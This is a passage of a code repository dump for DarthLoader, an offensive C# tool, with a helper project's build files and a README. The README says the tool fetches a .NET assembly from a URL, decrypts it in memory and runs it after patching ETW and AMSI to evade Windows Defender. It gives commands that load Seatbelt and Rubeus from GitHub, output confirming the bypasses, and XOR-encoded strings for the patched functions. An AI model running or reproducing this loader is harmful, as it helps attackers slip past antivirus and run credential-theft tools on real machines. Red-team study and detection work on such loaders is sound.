90 | //Console.WriteLine($"[+] Decrypted payload: {decrytedPayload}");
91 | }
92 | catch (IndexOutOfRangeException)
93 | {
94 | Console.WriteLine("[!] Provide an Xor key string.");
95 | }
96 | }
97 | }
98 | }
99 |
--------------------------------------------------------------------------------
/DarthLoaderHelper/DarthLoaderHelper/DarthLoaderHelper.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {4512803D-EE69-4DE9-9D47-56F1909C6049}
8 | Exe
9 | DarthLoaderHelper
10 | DarthLoaderHelper
11 | v4.6
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 | true
37 | bin\x64\Debug\
38 | DEBUG;TRACE
39 | full
40 | x64
41 | 7.3
42 | prompt
43 | true
44 |
45 |
46 | bin\x64\Release\
47 | TRACE
48 | true
49 | pdbonly
50 | x64
51 | 7.3
52 | prompt
53 | true
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
--------------------------------------------------------------------------------
/DarthLoaderHelper/DarthLoaderHelper/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("DarthLoaderHelper")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("DarthLoaderHelper")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("4512803d-ee69-4de9-9d47-56f1909c6049")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/DarthLoaderHelper/DarthLoaderHelper/obj/Debug/.NETFramework,Version=v4.6.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.6", FrameworkDisplayName = ".NET Framework 4.6")]
5 |
--------------------------------------------------------------------------------
/DarthLoaderHelper/DarthLoaderHelper/obj/Debug/DarthLoaderHelper.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
1 | MBRSC������
--------------------------------------------------------------------------------
/DarthLoaderHelper/DarthLoaderHelper/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/D4rthMaulCop/DarthNetLoader/e9fa453b8fce3bf94cdc7fca3f1b3efd14a41262/DarthLoaderHelper/DarthLoaderHelper/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/DarthLoaderHelper/DarthLoaderHelper/obj/Release/.NETFramework,Version=v4.6.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.6", FrameworkDisplayName = ".NET Framework 4.6")]
5 |
--------------------------------------------------------------------------------
/DarthLoaderHelper/DarthLoaderHelper/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/D4rthMaulCop/DarthNetLoader/e9fa453b8fce3bf94cdc7fca3f1b3efd14a41262/DarthLoaderHelper/DarthLoaderHelper/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/DarthLoaderHelper/DarthLoaderHelper/obj/x64/Release/.NETFramework,Version=v4.6.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.6", FrameworkDisplayName = ".NET Framework 4.6")]
5 |
--------------------------------------------------------------------------------
/DarthLoaderHelper/DarthLoaderHelper/obj/x64/Release/DarthLoaderHelper.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/D4rthMaulCop/DarthNetLoader/e9fa453b8fce3bf94cdc7fca3f1b3efd14a41262/DarthLoaderHelper/DarthLoaderHelper/obj/x64/Release/DarthLoaderHelper.csproj.AssemblyReference.cache
--------------------------------------------------------------------------------
/DarthLoaderHelper/DarthLoaderHelper/obj/x64/Release/DarthLoaderHelper.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | d3fcdfa2a8ddb7379f534d91fc483995f0747bd3
2 |
--------------------------------------------------------------------------------
/DarthLoaderHelper/DarthLoaderHelper/obj/x64/Release/DarthLoaderHelper.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | D:\SecToolDev\DarthLoaderHelper\DarthLoaderHelper\bin\x64\Release\DarthLoaderHelper.exe.config
2 | D:\SecToolDev\DarthLoaderHelper\DarthLoaderHelper\bin\x64\Release\DarthLoaderHelper.exe
3 | D:\SecToolDev\DarthLoaderHelper\DarthLoaderHelper\bin\x64\Release\DarthLoaderHelper.pdb
4 | D:\SecToolDev\DarthLoaderHelper\DarthLoaderHelper\obj\x64\Release\DarthLoaderHelper.csproj.AssemblyReference.cache
5 | D:\SecToolDev\DarthLoaderHelper\DarthLoaderHelper\obj\x64\Release\DarthLoaderHelper.csproj.CoreCompileInputs.cache
6 | D:\SecToolDev\DarthLoaderHelper\DarthLoaderHelper\obj\x64\Release\DarthLoaderHelper.exe
7 | D:\SecToolDev\DarthLoaderHelper\DarthLoaderHelper\obj\x64\Release\DarthLoaderHelper.pdb
8 |
--------------------------------------------------------------------------------
/DarthLoaderHelper/DarthLoaderHelper/obj/x64/Release/DarthLoaderHelper.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/D4rthMaulCop/DarthNetLoader/e9fa453b8fce3bf94cdc7fca3f1b3efd14a41262/DarthLoaderHelper/DarthLoaderHelper/obj/x64/Release/DarthLoaderHelper.exe
--------------------------------------------------------------------------------
/DarthLoaderHelper/DarthLoaderHelper/obj/x64/Release/DarthLoaderHelper.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/D4rthMaulCop/DarthNetLoader/e9fa453b8fce3bf94cdc7fca3f1b3efd14a41262/DarthLoaderHelper/DarthLoaderHelper/obj/x64/Release/DarthLoaderHelper.pdb
--------------------------------------------------------------------------------
/DarthLoaderHelper/DarthLoaderHelper/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/D4rthMaulCop/DarthNetLoader/e9fa453b8fce3bf94cdc7fca3f1b3efd14a41262/DarthLoaderHelper/DarthLoaderHelper/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # DarthLoader
2 | This is a project heavily inspired by Jean-François Maes's [SANS Workshop Reflection in C#](https://www.sans.org/webcasts/sans-workshop-reflection-in-c-/) to help (c)sharpen my C# dev skills. A lot of code was borrowed and/or extended for this project from:
3 | - https://github.com/cobbr/SharpSploit/tree/master/SharpSploit/Evasion
4 | - https://jfmaes-1.gitbook.io/reflection-workshop/
5 | - StackOverflow
6 |
7 | DarthLoader will do the following:
8 | - Remotely fetch a .Net assembly from the web using a base64 encoded url and Xor the byte array in memory.
9 | - Fetch a local .Net assembly into memory.
10 | - Bypass ETW and AMSI by decrypting function strings at runtime via xor key being passed as cmdline arg.
11 | - Decrypt and run the assembly from memory.
12 |
13 | ### Usage
14 | ```
15 | PS C:\SecToolDev\DarthLoader\DarthLoader\bin\x64\Release> .\DarthLoader.exe
16 |
17 | _______ __ __ __ __
18 | | \ | \ | \ | \ | \
19 | | $$$$$$$\ ______ ______ _| $$_ | $$____ | $$ ______ ______ ____| $$ ______ ______
20 | | $$ | $$| \ / | $$ \ | $$ \| $$ / \ | \ / $$/ \ / \
21 | | $$ | $$ \$$$$$$| $$$$$$\$$$$$$ | $$$$$$$| $$ | $$$$$$\ \$$$$$$| $$$$$$| $$$$$$| $$$$$$\
22 | | $$ | $$/ $| $$ \$$| $$ __| $$ | $| $$ | $$ | $$/ $| $$ | $| $$ $| $$ \$$
23 | | $$__/ $| $$$$$$| $$ | $$| | $$ | $| $$____| $$__/ $| $$$$$$| $$__| $| $$$$$$$| $$
24 | | $$ $$\$$ $| $$ \$$ $| $$ | $| $$ \$$ $$\$$ $$\$$ $$\$$ | $$
25 | \$$$$$$$ \$$$$$$$\$$ \$$$$ \$$ \$$\$$$$$$$$\$$$$$$ \$$$$$$$ \$$$$$$$ \$$$$$$$\$$
26 |
27 |
28 | ==================== USAGE: ====================
29 |
30 | --FunctionsXorKey : Xor key to decrypt function strings from DarthLoaderHelper.exe
31 | --FilePath : a local file path or URL to load a .Net asseembly from
32 | --Args : Xor key to decrypt function strings from DarthLoaderHelper.exe
33 | --XorKey : Xor key used to encrypt/decrypt .Net assembly from URL
34 |
35 | ==================== EXAMPLES: ====================
36 | DarthLoader.exe --FunctionsXorKey testing123 --FilePath https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.5_x64/Seatbelt.exe --Args AntiVirus --XorKey test
37 |
38 | DarthLoader.exe --FunctionsXorKey testing123 --FilePath https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.5_x64/Rubeus.exe --XorKey test
39 |
40 | DarthLoader.exe --FunctionsXorKey testing123 --FilePath C:\Users\d4ddyd4rth\Desktop\Hello.exe
41 |
42 | DarthLoader.exe --FunctionsXorKey testing123 --FilePath C:\Users\d4ddyd4rth\Desktop\Hello.exe --Args test
43 | ```
44 | ### Example
45 | ```
46 | PS D:\SecToolDev\DarthLoader\DarthLoader\bin\x64\Release> .\DarthLoader.exe --FunctionsXorKey testing123 --FilePath https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.5_x64/Seatbelt.exe --Args AntiVirus --XorKey test
47 |
48 | [!] ETW bypassed!
49 | [!] Amsi bypassed!
50 | _______ __ __ __ __
51 | | \ | \ | \ | \ | \
52 | | $$$$$$$\ ______ ______ _| $$_ | $$____ | $$ ______ ______ ____| $$ ______ ______
53 | | $$ | $$| \ / | $$ \ | $$ \| $$ / \ | \ / $$/ \ / \
54 | | $$ | $$ \$$$$$$| $$$$$$\$$$$$$ | $$$$$$$| $$ | $$$$$$\ \$$$$$$| $$$$$$| $$$$$$| $$$$$$\
55 | | $$ | $$/ $| $$ \$$| $$ __| $$ | $| $$ | $$ | $$/ $| $$ | $| $$ $| $$ \$$
56 | | $$__/ $| $$$$$$| $$ | $$| | $$ | $| $$____| $$__/ $| $$$$$$| $$__| $| $$$$$$$| $$
57 | | $$ $$\$$ $| $$ \$$ $| $$ | $| $$ \$$ $$\$$ $$\$$ $$\$$ | $$
58 | \$$$$$$$ \$$$$$$$\$$ \$$$$ \$$ \$$\$$$$$$$$\$$$$$$ \$$$$$$$ \$$$$$$$ \$$$$$$$\$$
59 |
60 |
61 | [*] Downloading and encrypting assembly with the key: test
62 | [+] Encrypted assembly loaded into memory...
63 | [+] Hit any key to run...
64 |
65 |
66 | %&&@@@&&
67 | &&&&&&&%%%, #&&@@@@@@%%%%%%###############%
68 | &%& %&%% &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%%
69 | %%%%%%%%%%%######%%%#%%####% &%%**# @////(((&%%%%%%######################(((((((((((((((((((
70 | #%#%%%%%%%#######%#%%####### %&%,,,,,,,,,,,,,,,, @////(((&%%%%%#%#####################(((((((((((((((((((
71 | #%#%%%%%%#####%%#%#%%####### %%%,,,,,, ,,. ,, @////(((&%%%%%%%######################(#(((#(#((((((((((
72 | #####%%%#################### &%%...... ... .. @////(((&%%%%%%%###############%######((#(#(####((((((((
73 | #######%##########%######### %%%...... ... .. @////(((&%%%%%#########################(#(#######((#####
74 | ###%##%%#################### &%%............... @////(((&%%%%%%%%##############%#######(#########((#####
75 | #####%###################### %%%.. @////(((&%%%%%%%################
76 | &%& %%%%% Seatbelt %////(((&%%%%%%%%#############*
77 | &%%&&&%%%%% v1.1.0 ,(((&%%%%%%%%%%%%%%%%%,
78 | #%%%%##,
79 |
80 |
81 | ====== AntiVirus ======
82 |
83 | Engine : Windows Defender
84 | ProductEXE : windowsdefender://
85 | ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe
86 |
87 |
88 |
89 | [*] Completed collection in 0.12 seconds
90 |
91 | <-----SNIP----->
92 | ```
93 |
94 | ## DarthLoaderHelper
95 | This project was made to help Xor encrypt the strings needed for passing into function calls to patch ETW/AMSI in Helpers.cs.
96 | ```
97 | D:\SecToolDev\DarthLoaderHelper.exe testing123
98 |
99 | [+] Encrypting with key: testing123
100 | [+] Encrypted string 'etwbypass': 11110416101E064241
101 | [+] Encrypted string 'amsibypass': 1508001D0B1717504140
102 | [+] Encrypted string 'ntdll.dll': 1A1117180540035D5E
103 | [+] Encrypted string 'EtwEventWrite': 311104311F0B094565411D1116
104 | [+] Encrypted string 'amsi.dll': 1508001D470A0B5D
105 | [+] Encrypted string 'AmsiScanBuffer': 3508001D3A0D065F704612031606
106 | ```
107 |
108 | ## To-do
109 | - [X] Help menu
110 | - [X] Paramerize URL
111 | - [X] Add local file assembly loading and parameterize file path
112 | - [X] Paramerize assembly parameters
113 |
--------------------------------------------------------------------------------